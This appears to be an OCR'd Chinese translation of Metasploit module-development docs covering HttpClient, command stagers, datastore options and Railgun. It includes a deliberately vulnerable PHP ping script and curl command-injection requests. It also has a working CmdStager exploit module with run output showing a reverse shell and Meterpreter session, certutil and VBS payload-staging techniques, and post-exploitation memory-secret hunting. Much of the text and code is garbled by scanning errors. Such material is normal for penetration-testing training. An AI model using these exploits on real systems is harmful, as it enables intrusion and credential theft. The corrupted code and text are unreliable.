这 是 一 个 如 何 编写 一 个 使 用 HttpClient mixin 发 送 基 本 HTTP 请 求 的 模块 的 例子 。 


主要 有 两 种 第 见 的 方法 : 


e send request raw - 您 使 用 此 发 送 一 个 原始 的 HTTP 请 求 。 通 常 ， 如 果 你 需要 不 常规 的 东 
西 ， 你 会 需要 这 个 方法 。 在 大 多 数 情况 下 ， 你 应 该 更 喜欢 Send request _ cgi。 如 果 你 想 了 
解 这 个 方法 的 工作 原理 ， 请 查看 Rex::Proto::Http::Clien 协 request_raw 的 文档 。 

e send request cgi - 您 使 用 它 来 发 送 更 多 CGI 兼容 的 HTTP 请 求 。 如 果 你 的 请 求 包含 查询 
字符 串 (或 POST 数据 ) ， 那 么 你 应 该 使 用 这 个 。 如 果 你 想 了 解 这 种 方法 如 何 工作 ， 请 查看 
Rex::Proto::Http::Client#request_cgi 这 是 一 个 send request cgi 非常 基本 的 例子 

send request cgi((1 
'method' => 'GET', 
'uri' => '/hello world.php', 
"vars_get' => { 
'param 1' => 'abc', 
'param 2' => '123' 


} 
}) 


请 注意 : send request raw 和 send_request_cgi 如 果 超 时 会 返回 一 个 nil， 请 在 处 理 返 回 
值 的 时 候 考 虑 这 个 情况 


URI 解 析 


在 发 送 HTTP 请 求 之 前 ， 您 很 可 能 必须 做 一 些 URI 解 析 。 这 是 一 个 棘 手 的 任务 ， 因 为 有 时 当 你 
加 入 路 径 ， 你 可 能 会 不 小 心得 到 双 斜 线 ， 如 :“/test//index.php”°。 或 者 由 于 某 种 原因 ， 你 又 缺 
少 一 个 斜 线 。 这 些 确 实 是 常 犯 的 错误 。 所 以 这 里 是 你 如 何 安全 地 处 理 它 1- 将 您 的 默认 URI 数 
据 存 储 选 项 注册 为 "TARGETURI”: 

register options( 


[ 


x v1/']) 
], self.class) 


OptString.new('TARGETURI', [true, 'The base path to XXX application', '/xx 


2- Jo RAR TARGETURI target_uri， 这 样 的 URI 输 入 将 会 被 验证 ， 然 后 你 得 到 一 个 点 实 的 URI 
对 象 在 这 个 例子 中 ， 我 们 将 只 加 载 路 径 : 


uri = target uri.path 


3- 当 您 想 要 加 入 另 一 个 URI 时 ， 请 始终 使 用 normalize uri :例子 


# Returns: "/xxx v1/admin/upload.php" 
uri = normalize uri(uri, 'admin', 'upload.php') 


4 - 当 您 完成 URI 的 规范 化 后 ， 即 可 使 用 send_request_ cgiXsend request raw 
请 注意 : 该 normalize_uri 方 法 将 始终 遵循 这 些 规则 : 


该 URI 应 该 始终 以 斜 线 开 头 。 你 将 不 得 不 决定 是 否 需要 结尾 的 斜 杠 。 不 应 该 有 双 斜 杠 。 


一 个 完整 例子 


require 'msf/core' 
class MetasploitModule « Msf::Auxiliary 
include Msf::Exploit::Remote::HttpClient 


def initialize(info = {}) 
super (update_info(info, 


'Name' -» 'HttpClient Example', 
'Description' => %q{ 

Do a send request cgi() 
3 
'Author' => [ 'sinn3r' ], 
'License' -» MSF LICENSE 


)) 
register options( 
OptString.new('TARGETURI', [true, 'The base path', '/']) 


], self.class) 
end 


def run 
uri - target uri.path 


res = send request cgi({ 
'method' => 'GET', 
'uri' -» normalize uri(uri, 'admin', 'index.phpp'), 
'vars get' => { 
'pi' => "This is param 1", 
'p2' => "This is param 2" 


2d 


if res && res.code -- 200 
print good("I got a 200, awesome" 
else 
print error("No 200, feeling blue") 
end 
end 
end 


使 用 Burp 和 套件 


Burp Suite 是 一 个 有 用 的 工具 ， 用 于 在 使 用 HttpClient 开 发 模块 的 同时 检查 或 修改 HTTPS 流 


Eo ARRA: 


1. 启动 burp java -jar burpsuite.jar 

2. 在 Burp 中 ， 单 击 “"proxy” 选 项 卡 ， 然 后 单 击 “option?。 在 那里 配置 代理 侦 听 器 。 在 这 个 例子 
中 ， 假 设 我 们 在 6666 端 口上 有 一 个 监听 器 。 

3. 一 旦 Burp 侦 听 器 启动 ， 启 动 msfconsole 并 加 载 您 正在 处 理 的 模块 

4. ee : set Proxies HTTP:127.0.0.1:6666 

b. 继续 运行 模块 ，Burp 应 拦截 HTTPS 流 量 请 注意 ，Burp 仅 支持 HttpClient 的 HTTPS ° 
m bos o 


如 果 您 需要 检查 HttpClient 的 HTTP 通 信 ， 解 决 方法 是 在 模块 中 添加 以 下 方法 。 这 将 履 盖 
HttpClient 的 sendreguest* 方 法 ， 并 返回 修改 的 输出 : 


你 也 可 以 为 send_ request raw 做 同样 的 事情 


其 他 常见 问题 


1 -我 可 以 一 起 使 用 vars_get 和 vars_post 么 是 。 当 你 提供 一 个 散 列 vars_get, 基 本 上 它 意 味 
着 “把 所 有 的 数据 在 查询 字符 串 ”. 当 你 提供 一 个 散 列 vars_post， 意 味 着 “把 所 有 这 些 数据 放 在 正 
文中 ”。 他 们 都 将 发 送 相 同 的 请 求 。 当 然 ， 你 确实 需要 确保 你 在 使 用 send_request_cgi。 


2 -我 由 于 一 些 奇怪 的 原因 不 能 使 用 vars_get 或 vars_post， 该 怎么 办 ? 在 代码 中 提 及 这 个 问题 
(作为 注释 )。 如 果 你 不 能 使 用 vars_post， 你 可 以 尝试 一 下 data 键 ， 它 会 发 送 你 的 原始 数据 。 
通常 情况 下 ， 解 决 问题 的 最 常见 的 解决 方案 vars_get 是 将 您 的 东西 留 在 Uri 关键 位 置 。msftidy 
会 标记 这 个 ， 但 只 是 作为 “Info” 而 不 是 警告 ， 这 意味 着 你 仍然 应 该 通过 msftidy。 如 果 这 是 一 个 
常见 问题 ， 我 们 可 以 随时 更 改 msftidy ° 


3 - 我 需要 手动 进行 基本 身份 验证 吗 ? 您 不 需要 在 请 求 中 手动 执行 基本 身份 验证 ， 因 为 
HttpClient 应 该 自动 为 您 执行 此 操作 。 您 只 需 在 数据 存储 区 选项 中 设置 用 户 名 和 密码 ， 然 后 当 
Web 服 务 器 询问 时 ，mixin 将 使 用 该 用 户 名 和 密码 。 


命令 阶段 提供 了 一 种 简单 的 方法 来 编写 针对 典型 漏洞 例如 命令 执行 或 者 代码 注入 .目前 有 入 
种 不 同 的 命令 阶段 ,每 种 都 使 用 系统 命令 来 保存 你 的 payload, 有 时 会 解码 并 执行 


漏洞 测试 用 例 


解释 如 何 使 用 命令 stager 的 最 好 方法 可 能 是 通过 演示 .在 这 D UT 令 注 入 漏 
洞 ， 在 企业 级 软件 中 实 A 一 些 思 奢 的 东西 。 这 个 漏洞 使 得 你 可 以 在 系统 调用 ping 
中 注入 额外 的 系统 命 


<?php 
if ( isset($ GET["ip"]) ) { 
$output = system("ping -c 1 " . $ GET["ip"]); 
die($output); 
} 


?> 


«html» 
«body» 
«form action = "ping.php" method = "GET"> 
IP to ping: <input type = "text" name = "ip" /» «input type = "submit" /> 
«/form» 
«/body» 
</html> 


将 上 面 的 php 脚 本 (ping.php) 放 在 Ubuntu + Apache + PHP 系统 在 正常 的 使 用 情况 下 ， 这 是 脚 
本 的 行为 它 只 是 ping 你 指定 的 主机 ， 并 显示 你 的 输出 你 的 输出 


$ curl "http://192.168.1.203/ping.php?ip-127.0.0.1" 
PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data. 
64 bytes from 127.0.0.1: icmp seq-1 ttl-64 time=0.017 ms 


--- 127.0.0.1 ping statistics --- 

1 packets transmitted, 1 received, 0% packet loss, time Oms 
rtt min/avg/max/mdev - 0.017/0.017/0.017/0.000 ms 

rtt min/avg/max/mdev - 0.017/0.017/0.017/0.000 ms 


好 的 , 接 下 来 我 们 能 小 用 这 一 点 来 执行 另 一 个 系统 命令 (id) 


$ curl "http://192.168.1.203/ping.php?ip-127.0.0.1496269626* id" 
PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data. 
64 bytes from 127.0.0.1: icmp seq-1 ttl-64 time=0.020 ms 


--- 127.0.0.1 ping statistics --- 

1 packets transmitted, 1 received, 0% packet loss, time Oms 
rtt min/avg/max/mdev = 0.020/0.020/0.020/0.000 ms 
uid-33(www-data) gid-33(www-data) groups-33(www-data) 
uid-33(www-data) gid-33(www-data) groups-33(www-data) 


看 到 这 个 www-data? 它 是 上 面 我 们 要 求 脚本 执行 的 第 二 个 命令 的 输出 .通过 这 样 做 ,我 们 也 可 
以 做 更 令 人 讨厌 的 事情 比如 将 一 个 Meterpreter 负 载 写 入 目标 系统 ,然后 执行 它 


The Msf::Exploit::CmdStager Mixin 


让 我 们 来 讨论 如 何在 上 面 的 脚本 通过 命令 阶段 来 利用 它 . 有 几 个 步骤 你 需要 做 1. 引 入 
Msf::Exploit::CmdStager Mixin 尽管 N ' 126 78 5 Metasploit A RF 
X- 2| A Msf::Exploit::CmdStager 这 个 mixin 基 本 上 是 所 有 八 个 命令 阶段 的 一 个 接口 : 


include Msf::Exploit::CmdStager 


2. 声 明 你 想 要 的 类 别 415 Msf::Exploit::CmdStager 你 想 要 的 类 型 .你 能 在 模块 元 数据 添加 这 
个 cmdStagerFlavor 信息 .无 论 是 从 普通 级 别 还 是 目标 级 别 。 允 许多 种 对 一 个 特定 目标 设置 类 
别 的 一 个 例子 


"Targets ' => 
[ 'Windows', 
'Arch' => [ ARCH X86 64, ARCH X86 ], 
'Platform' => 'win', 
"CmdStagerFlavor' => [ 'certutil', 'vbs' ] 
} 


] 
] 


或 者 ， 您 可 以 将 此 信息 传递 给 execute_cmdstager 方 法 (请 从 参阅 调用 #execute_cmdstager 开 
始 ) 


execute cmdstager(flavor: :vbs) 


3. 创 造 一 个 execute command 方法 你 必须 在 你 的 模块 创造 一 
个 def execute command(cmd, opts = {}) 方法 .这 就 是 CmdStager mixin 在 启动 时 所 调用 的 方法 . 
你 在 这 个 方法 中 的 目标 是 把 cmd 变 量 中 的 所 有 东西 都 注入 到 漏洞 代码 中 。 


4. 开 始 调用 #execute_cmdstager 最 后 ， 在 你 的 利用 方法 中 ， "A execute cmdstager 开始 命 
令 阶 段 多 年 来 ， 我 们 还 了 解 到 ， 在 调用 execute_cmdstager 时 > 选项 非常 方便 


e flavor - 您 可 以 从 这 里 指定 要 使 用 的 命令 stager (flavor) 选项 有 : :bourne , :debug asm , 
:debug write , :echo , :printf , :vbs ， :certutil , :tftp. 

e delay - 每 个 命令 执行 之 间 要 延迟 多 少时 间 0.25 是 默认 值 。 

。 linemax -每 个 命令 的 最 大 字符 数 。2047 是 默认 的 。 


Msf::Exploit::CmdStager 模块 至 少 ,这 是 你 使 用 CmdStager mixin 时 你 应 该 如 何 开 始 


require 'msf/core' 


class MetasploitModule « Msf::Exploit::Remote 


Rank - NormalRanking 
include Msf::Exploit::CmdStager 


def initialize(info={}) 
super(update info(info, 


'Name' -» "Command Injection Using CmdStager", 
'Description' => %q{ 

This exploits a command injection using the command stager. 
3 
'License' -» MSF LICENSE, 
"Author ' => [ 'sinn3r' 
'References' => [ [ 'URL', 'http://metasploit.com' ] ], 
'Platform' => 'linux', 
'Targets' => [[ 'Linux', 
'Payload' => ( 'BadChars' => "\x00" }, 


"CmdStagerFlavor' => [ 'printf' ], 


UPRavaleged => false, 


'DisclosureDate' => "Jun 10 2016", 


'DefaultTarget ' => 0)) 
end 


def execute_command(cmd, opts = {}) 


# calls some method to inject cmd to the vulnerable code. 


end 


def exploit 
print_status("Exploiting...") 
execute_cmdstager 

end 


end 
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解释 ， 但 基本 上 它 是 将 我 们 的 有 效 载荷 写 入 /tmp 并 执行 


命 


>> 


[si 


令 stager。 稍 后 我 们 会 对 此 进行 更 多 
。 现 在 我 们 来 修改 


execute_command 方 法 ， 并 根据 测试 用 例 获 得 代码 执行 。 基 于 PoC， 我 们 知道 我 们 的 注入 字 


符 串 应 该 是 这 样 的 : 


127.0.0.1+%26%26+[Malicious commands] 


我 们 使 用 HttpClient 在 execute_command 中 执行 操作 .注意 实际 上 有 一 些 坏 字符 过 滤 使 得 


exploit 正 确 工作 .这 是 预期 的 


def filter bad chars(cmd) 
cmd.gsub!(/chmod \+x/, 'chmod 777') 
cmd.gsub!(/;/, ' %26%26 ') 
cmd.gsub!(/ /, '-*') 

end 


def execute command(cmd, opts = {}) 
send request cgi((1 


'method' => 'GET', 
“(irae => '/ping.php', 
'encode params' => false, 
"vars_get' => { 
‘ip' => "127.0.0.1+%26%26+#{filter_bad_chars(cmd)}" 
} 
}) 
end 


def exploit 
print_status("Exploiting...") 
execute cmdstager 

end 


让 我 们 运行 一 下 我 们 应 该 得 到 一 个 shell 


msf exploit(cmdstager demo) > run 

*] Started reverse TCP handler on 10.6.0.92:4444 

*] Exploiting... 

*] Transmitting intermediate stager for over-sized stage...(105 bytes) 
*] Sending stage (1495599 bytes) to 10.6.0.92 

“Il 


Meterpreter session 1 opened (10.6.0.92:4444 -> 10.6.0.92:51522) at 2016-06-10 11: 


[ 
[ 
[ 
[ 
[ 
51:03 -0500 


类 别 


我 们 已 经 知道 如 何 使 用 Msf::Exploit::CmdStager mixin, 让 我 们 来 看 看 我 们 能 使 用 的 命令 阶段 


VBS Command Stager - Windows Only 


这 个 VBS command stager Mu 他 会 base64 编 码 我 们 的 payload， nee 我 们 的 目标 机 
器 .还 使 用 echo 写 入 vbs 脚 本 ,然后 vbs 脚 本 对 Base64 有 效 载 荷 进 行 解 码 并 执行 它 。 如果 您 正在 
利用 XarPowershellsi Windows | 那么 您 可 能 会 考虑 使 用 它 来 代替 VBS pis > AA 

Powershell 往 往 更 隐蔽 。 要 使 用 VBS stager， 可 以 在 元 数据 中 指定 CmdStagerFlavor : 


"CmdStagerFlavor' => [ 'vbs' ] 


或 者 在 execute_cmdstager 设 置 :vbs 


execute cmdstager(flavor: :vbs) 


你 还 需要 你 的 模块 支持 平台 包括 windows( 也 在 元 数据 ), 例 子 


'Platform' => 'win' 


Certutil Command Stager - Windows Only 


Certutil 是 一 个 Windows 命 令 , 可 用 于 转 储 和 显示 证 书 颁 发 机 构 ,配置 信息 ， 配 置 证 书 服务 ， 备 
份 和 还 原 CA 组 件 等 . 它 只 支持 从 window2018,2012 开 始 的 windows 系 统 在 certutil 也 可 以 为 我 们 
做 的 是 从 证 书 解 码 Base64 字 符 串 ， 并 将 解码 的 内 容 保存 到 一 个 文件 。 以 下 说 明 : 


echo ----- BEGIN CERTIFICATE----- » encoded.txt 
echo Just Base64 encode your binary data 

echo TVoAAA-- >> encoded.txt 

echo ----- END CERTIFICATE----- >> encoded.txt 
certutil -decode encoded.txt decoded.bin 


为 了 利用 这 个 优势 ，Certutil 命 令 stager 会 将 有 效 载荷 保存 在 Base64 字 符 串 中 作为 假 证 书 ， 请 
求 certutil 对 其 进行 解码 ， 最 后 执行 它 。 


要 使 用 VCertutil stager， 可 以 在 元 数据 中 指定 CmdStagerFlavor : 


"CmdStagerFlavor' => [ 'certutil' ] 


A 3t Æ execute cmdstageri&  :certutil 


execute cmdstager(flavor: :certutil) 


你 还 需要 你 的 模块 支持 平台 包括 windows( 也 在 元 数据 ), 例 子 


'Platform' => 'win' 


注意 : 这 个 文档 可 能 需要 审查 一 个 数据 存储 选项 是 用 户 可 以 设置 的 变量 的 一 个 类 型 ,允许 
metasploit 的 各 种 组 件 在 使 用 时 更 具有 配置 性 .例子 ,在 msfconsole, 你 能 设置 ConsoleLogging 选 
项 来 记录 所 有 控制 台 的 输入 输出 的 所 有 日 志 -- 在 渗透 过 程 中 方便 文档 记录 的 一 种 方法 . 当 你 载 
入 一 个 模块 ,这 个 mixin 或 模块 会 注册 更 多 选项 .一 些 常 见 的 有 :用 于 服务 器 exploit 或 辅助 模块 的 
RHOST 和 RPORT ,客户 端 模块 的 SRVHOST 等 等 .准确 找 出 可 以 设置 的 数据 存储 选项 的 最 佳 
方法 是 通过 使 用 以 下 命令 


* show options - Shows you all the basic options. 

* show advanced - Shows you all the advanced options. 

e show missing - Shows you all the required options you have not configured. 

* set - Shows you everything. Obviously you also use this command to set an option. 


2 75 7$: ModuleDataStore, active module, session, and 
framework 


用 户 如 何 查看 数据 储存 选项 : 在 用 户 方面 ,数据 储存 选项 像 全 局 或 者 模块 级 别 :全 局 意味 全 部 模 
块 都 能 使 用 该 选项 .可 以 使 用 setg 命令 来 设置 .模块 级 别 意 味 着 只 有 你 当前 正在 使 用 的 模块 会 
记 住 储存 选项 ,没有 其 他 的 能 记 住 .如 果 先 加 载 模块 , 则 需要 设置 模块 级 别 选 项 ， 然 后 使 

用 set 命令 ， 像 下 面 这 样 : 


msf > use exploit/windows/smb/msO8 067 netapi 
msf exploit(msO8 067 netapi) > set rhost 10.0.1.3 
rhost -» 10.0.1.3 


metasploit 开 发 者 如 何 查看 数据 储存 选项 在 开发 方面 ,事情 有 点 疯狂 .数据 存储 选项 实际 上 可 以 
在 至 少 四 个 不 同 的 来 源 中 找到 :the ModuleDataStore object, active module, session object, 
or the framework object. 如 果 你 只 是 进行 模块 开发 .你 能 信任 的 最 好 的 源 是 ModuleDataStore 
对 象 .这 个 对 象 有 一 个 特定 的 加 载 顺 序 ， 然 后 把 所 需 的 选项 交 给 你 .如 果 这 个 选项 可 以 在 模块 的 
数据 存储 中 找到 ， 它 会 给 你 这 个 选项 。 如 果 没 有 找到 ， 它 从 一 个 框架 给 你 一 个 .以 下 是 如 何 读 
取 模 块 中 的 数据 存储 选项 的 例子 


current host = datastore['RHOST'] 


如 果 你 的 开发 工作 在 模块 领域 之 外 ,那么 很 有 可 能 你 甚至 没有 ModuleDataStore 对 象 。 但 是 在 
一 些 情况 ,你 仍然 可 以 从 驱动 程序 读 取 active_ module accessor .或 者 如 果 你 可 以 访问 
ModuleCommandDispatcher, 有 一 个 一 个 给 你 相同 东西 的 mod 方法 .有 时 mixin 会 在 派发 模块 的 
时 候 会 通过 run_simple 方法 进行 传递 .比如 ,你 可 以 看 这 
^*Msf::Ui::Console::CommandDispatcher::Auxiliary * 在 一 些 情况 就 像 在 post exploit 运 行 脚 
本 ,你 可 能 没有 ModuleDataStore 或 者 active_ module, 但 是 你 应 该 仍然 有 一 个 Session 对 象 .应 
该 有 一 个 exploit datastore 给 你 所 有 的 数据 储存 选项 


session.exploit datastore 


如 果 你 无 权 访 问 模块 或 者 session 对 象 ,最 后 的 源 显 然 是 这 个 ffamework 对 象 . 并 且 这 个 
framework 对 象 总 是 存在 .否则 , 像 我 们 之 前 说 的 ,如 果 用 户 设 置 一 个 module-level 选项 没有 其 
他 的 组 件 可 以 看 到 他 ,这 引入 框架 对 象 


framework.datastore 


所 以 现在 你 知道 数据 储存 选项 的 多 个 来 源 . 希 望 在 这 一 点 上 ,你 清楚 的 认识 到 不 是 所 有 的 源 必然 
分 享 所 有 的 东西 .如 果 你 尝试 所 有 东西 , 像 一 个 生成 规则 ,这 应 该 是 你 的 载 入 顺序 
Try from the ModuleDataStore 


Try from active module 
Try from session 


ome 


Try from framework 


所 有 核心 数据 储存 选项 类 型 是 定义 在 option_containerrb 文件 .你 应 该 总 是 挑选 最 合适 的 一 个 ， 
为 每 个 都 有 自己 的 输入 验证 


那么 你 在 数据 注册 阶段 初始 化 一 个 选项 , 它 应 该 遵循 以 下 格式 


OptSomething.new(option name, [boolean, description, value]) 


e option name -选项 的 名 字 

e boolean - 第 一 个 属性 ,true 的 意思 是 这 是 一 个 必 选 的 false 的 意思 是 这 是 一 个 可 选 的 

e description - 关于 这 个 选项 的 短 描 述 

e value - 一 个 默认 值 ,注意 如 果 第 一 个 属性 是 false, 你 不 需要 提供 这 个 值 , 它 将 会 自动 十 充 ni 

现在 让 我 们 讨论 关于 什么 类 是 可 用 的 

e OptString - 通常 用 于 字符 囊 选 项 。 如 果 输 入 以 "file : /开头 ， 则 OptString 也 会 自动 假定 
这 是 一 个 文件 ， 并 从 中 读 取 。 但 是 ， 在 发 生 这 种 情况 时 没有 文件 路 径 验证 ， 所 以 如 果 要 
加 载 文件 ， 则 应 该 使 用 OptPath， 然 后 自己 读 取 该 文件 。 代 码 示 例 : 


OptString.new('MYTEST', [ true, 'Set a MYTEST option', 'This is a default value' ]) 


。 OptRaw 实际 上 它 的 功能 与 OptString 完 全 相同 


e OptBool - bool 选 项 它 将 验证 输入 是 true 或 者 false. 例 如 y yes, n, no, 0, 1, 代码 示例 


OptBool.new('BLAH', [ true, 'Set a BLAH option', false ]) 


。 OptEnum - 基本 上 这 将 限制 输入 到 特定 的 选项 。 例 如 ， 如 果 您 希望 输入 是 apple 或 
者 orange ,而 不 是 其 他 的 .那么 DptEnum 就 是 您 的 选择 。 代 码 示 例 : 


4 Choices are: apple or range, defaults to apple 
OptEnum.new('FRUIT', [ true, 'Set a fruit', 'apple', ['apple', 'orange']]) 


。 OptPort -对 于 输入 它 意味 着 是 用 作 端 口号 。 这 个 数字 应 该 在 0 - 65535 之 间 。 代 码 示例 : 
OptPort.new('RPORT', [ true, 'Set a port', 21 ]) 


e OptAddress 作为 IPv4 地 址 的 输入 。 代 码 示 例 : 


optAddressanew( TP i) enue; Se an TRA qon d 3 | 


e OptAddressRange 作为 IPv4 地 址 的 输入 ,例如 : 10.0.1.1-10.0.1.20 或 10.0.1.1/24。 您 也 
可 以 提供 文件 路 径 而 不 是 范围 ， 它 会 自动 将 该 文件 视 为 IP 列 表 。 或 者 ， 如 果 你 使 用 
rand: 3 语法 ， 其 中 3 意味 着 3 次 ， 它 会 为 你 生成 3 个 随机 IP。 代 码 示例 : 

OptAddressRange.new('Range', [ true, 'Set an IP range', '10.0.1.3-10.0.1.23' ]) 

。 OptPath 如 果 你 的 数据 储存 选项 要 求 一 个 本 地 文件 路 径 . 请 使 用 此 选项 

OptPath.new('FILE', [ true, 'Load a local file' ]) 

e Optint 它 可 以 是 一 个 16 进 制 值 或 者 10 进 制 

OptInt.new('FILE', [ true, 'A hex or decimal', 1024 ]) 

e OptRegexp 是 一 个 正则 表达 式 数 据 存 储 选项 


OptRegexp.new('PATTERN', [true, 'Match a name', '^alien']), 


Other types: 在 茶 些 情况 下 ， 可 能 没有 适合 您 的 数据 存储 选项 类 型 。 最 好 的 例子 是 URL : FP 
使 没有 OptUrl 这 样 的 东西 ， 你 可 以 做 的 是 使 用 OptString 类 型 ， 然 后 在 你 的 模块 中 做 一 些 验 
证 ， 如 下 所 示 : 


def valid?(input) 
if input =~ /Ahttp:\/\/.+/i 
rie turnstue 
else 
# Here you can consider raising OptionValidateError 
return false 
end 
end 


if valid?(datastore['URL']) 
# We can do something with the URL 
else 


# Not the format we're looking for. Refuse to do anything. 
end 


register options 方法 


这 register options 方法 可 以 注册 多 个 基本 数据 存储 选项 。 基 本 数据 存储 选项 是 必须 配置 的 
选项 ， 例 如 服务 器 端 漏洞 中 的 RHOST 选 项 。 或 者 它 是 非常 常用 的 ， 例 如 登录 模块 中 的 各 种 用 
户 名 /密码 选项 。 


以 下 是 在 模块 中 注册 多 个 数据 存储 选项 的 示例 : 


register options( 
[ 
OptString.new('SUBJECT', [ true, 'Set a subject' ]), 
OptString.new('MESSAGE', [ true, 'Set a message' ]) 
], self.class) 


register advanced options 方法 


这 个 register advanced options 方法 以 注册 多 个 高 级 数据 存储 选项 。 高 级 数据 存储 选项 是 在 
使 用 模块 之 前 不 需要 用 户 配 置 的 选项 。 例 如 ， 代 理 选 项 几乎 总 是 被 视 为 “高 级 *。 但是， 当然 ， 
这 也 意味 着 大 多 数 用 户 会 觉得 难以 配置 。 


注册 高 级 选项 的 示例 : 
register advanced options( 


OptInt.new('TIMEOUT', [ true, 'Set a timeout, in seconds', 60 ]) 
jp self class) 


更 改 数据 存储 选项 的 默认 值 


当 一 个 数据 存储 选项 已 经 被 一 个 mixin 注 册 时 ， 仍 然 有 办 法 改变 模块 的 默认 值 。 您 可 以 使 
用 register options 方法 ， 也 可 以 在 模块 的 元 数据 中 添加 一 个 DefaultOptions 键 。 


使 用 register_options 更 改 默 认 值 : 


使 用 register_options 其 中 一 个 优点 是 ， 如 果 数 据 存储 选项 是 高 级 的 ， 这 就 允许 它 在 基本 选项 
菜单 上 ， 这 意味 着 当 人 们 在 msfconsole 上 “show options” 时 ， 该 选项 将 会 在 那里 。 您 还 可 以 更 
改选 项 说 明 ， 以 及 此 方法 是 否 必 须 。 


使 用 DefaultOptions 更 改 默 认 值 : 


当 Metasploit 初 始 化 一 个 模块 时 ， 将 会 调用 import defaults 方法 。 此 方法 将 更 新 所 有 现 有 的 
数据 存储 选项 (这 就 是 为 什么 register_options 可 以 用 来 更 新 默认 值 ) ， 然 后 它 将 专门 检查 
模块 元 数据 中 的 DefaultOptions 键 ， 并 再 次 更 新 。 


下 面 是 一 个 使 用 DefaultOptions 键 的 exploit 模 块 初始 化 的 例子 


def initialize(info={}) 
super(update info(info, 
'Name' -» "Module name", 
'Description' => %q{ 
This is an example of setting the default value of RPORT using the DefaultOption 
s key 


3 
'License' => MSF LICENSE, 
'Author' => [ 'Name' ], 
iReferences" => 
[ SUIS yt ] 
'Platform' => 'win', 
5rnangets? => 
[ 'Windows', { 'Ret' => 0x41414141 } ] 
], 
'Payload' => 


'BadChars' => "\x00" 
re => 

'RPORT' => 8080 
T -» false, 
'DisclosureDate' => "", 


'DefaultTarget' => 9)) 
end 


deregister options 方法 
deregister options 方法 可 以 注销 基本 或 高 级 选项 。 用 法 非常 简单 : 


deregister options('OPTIONi', 'OPTION2', 'OPTION3') 


在 运行 时 改变 数据 存储 选项 


目前 ， 在 运 


云 行 Aa 项 最 安全 的 方法 是 重 写 一 个 方法 。 例 如 ， 一 些 mixins 像 这 样 检 
索 RPORT 选 项 


def rport 
datastore['RPORT'] 
end 


JE GEHE OUT ^ WRT ANIR F R SK rportzr X o FRA-TAM YA 


def rport 
80 
end 


这 样 ， 当 一 个 mixin 想 要 这 个 信息 的 时 候 ， 最 终 的 值 是 80， 而 不 是 实际 的 


值 datastore['RPORT'] 


理想 的 数据 存储 命名 


正常 选项 总 是 大 写 ， 高 级 选项 是 驼峰 式 ,规避 选项 是 前 缓 :: 驼 峰 式 


RailGunner:€ Windows Meterpreter 独 有 的 强大 的 后 期 开发 功能 。 它 可 以 让 你 完全 控制 你 的 目 
标 机 器 的 Windows API， 或 者 你 可 以 使 用 你 找到 的 任何 DLL， 并 用 它 做 更 多 的 创意 性 的 工作 。 
例如 : 假设 您 在 Windows 目 标 上 有 一 个 meterpreter 会 话 。 你 有 一 个 特定 的 应 用 程序 ， 你 认为 
存储 用 户 的 密码 ， 但 它 是 加 密 的 ， 但 是 没有 工具 在 那里 解密 。 使 用 RailGun， 你 可 以 做 的 是 ， 
你 可 以 进入 这 个 进程 ， 并 查找 内 存 中 发 现 的 任何 敏感 信息 ， 或 者 你 可 以 查找 负责 解密 的 程序 

的 DLL， 调 用 它 ， 并 让 它 为 你 解密 。 如 果 你 是 渗透 测试 人 员 ， 显 然后 期 开发 是 一 项 重要 的 技 

能 ， 但 如 果 你 不 知道 railgun, 你 错过 很 多 ， 


定义 一 个 DLL 及 其 亟 数 


Windows API 显 然 是 相当 多 的 ， 所 以 默认 情况 下 ，Railgun 只 有 一 些 预定 义 的 DLL 和 通常 用 于 
构建 Windows 程 序 的 函数 。 这 些 内 置 DLL 是 : kernel32, ntdll, user32, ws2 32, iphlpapi, 
advapi32, shell32, netapi32, crypt32, wlanapi, widap32, version. 内 置 DLL 的 相同 列表 也 可 以 
通过 使 用 该 known dll names 方法 来 检索 。 


所 有 all 定 义 可 以 在 这 个 "def" 目录 找到 .他 们 是 像 一 个 类 一 样 定义 的 .下 面 的 模块 应 该 能 演示 一 个 
dll 是 怎么 定义 的 


# -*- coding: binary -* 
module Rex 

module Post 

module Meterpreter 
module Extensions 
module Stdapi 

module Railgun 

module Def 


class Def somedll 


def self.create dll(dll path - 'somedll') 
dll = DLL.new(dll path, ApiConstants.manager ) 


# 1st argument = Name of the function 

# 2nd argument = Return value's data type 

à 3rd argument - An array of parameters 

dll.add function('SomeFunction', 'DWORD',[ 
["DWORD", "hwnd", ames 

]) 


return dll 
end 


end 


end; end; end; end; end; end; end 


在 函数 定义 ,railgun 支 持 这 些 数据 类 型 :VOID, BOOL, DWORD, WORD, BYTE, LPVOID, 
HANDLE, PDWORD, PWCHAR, PCHAR, PBLOB. 有 四 个 参数 /缓冲 区 说 明 :in, out, inout, and 
return. 将 值 传递 给 "in" 参 数 时 ，Railgun 将 处 理 内 存 管理 。 例 如 ，MessageBoxA 有 一 个 名 

为 “in? 的 参数 |pText， 并 且 是 PCHAR 类 型 。 你 可 以 简单 地 传递 一 个 Ruby 字 符 串 ， 然 后 Railgun 
处 理 剩 下 的 事情 ， 这 非常 简单 。 “out" 参 数 将 始终 是 指针 数据 类 型 。 基 本 上 ， 你 告诉 Railgun 要 
为 参数 分 配 多 少 字 节 ， 它 分 配 内 存 ， 在 调用 函数 时 提供 一 个 指向 它 的 指针 ， 然 后 读 取 该 函数 


写 入 的 内 存 区 域 ， 将 其 转换 为 Ruby 对 象 ， 并 将 其 添加 到 返回 字典 。 一 个 “inout" 参 数 作为 被 调 
用 函数 的 输入 ， 但 是 可 能 会 被 其 修改 。 您 可 以 检查 修改 后 的 值 的 返回 散 列 ， 如 out" 参数 。 在 
运行 时 定义 一 个 新 函数 的 快速 方法 ,可 以 像 下 面 的 例子 那样 完成 : 


client.railgun.add function('user32', 'MessageBoxA', 'DWORD',[ 
["DWORD", "hwnd", Eom 
I PCHAR S LOTmext sal Mealy 
["PCHAR", "1pCaption", “ini, 
["DWORD", "urype", "in 
1) 


但 是 ， 如 果 这 个 函数 很 可 能 被 多 次 使 用 ， 或 者 它 是 Windows API 的 一 部 分 ， 那 么 你 应 该 把 它 
放 在 库 中 。 


示例 


尝试 Railgun 的 最 好 方法 是 在 Windows Meterpreter 提 示 符 下 使 用 irb。 这 是 一 个 如 何 到 达 的 例 
qd 


$ msfconsole -q 
msf » use exploit/multi/handler 
msf exploit(handler) » run 


] Started reverse handler on 192.168.1.64:4444 

] Starting the payload handler... 

] Sending stage (769536 bytes) to 192.168.1.106 

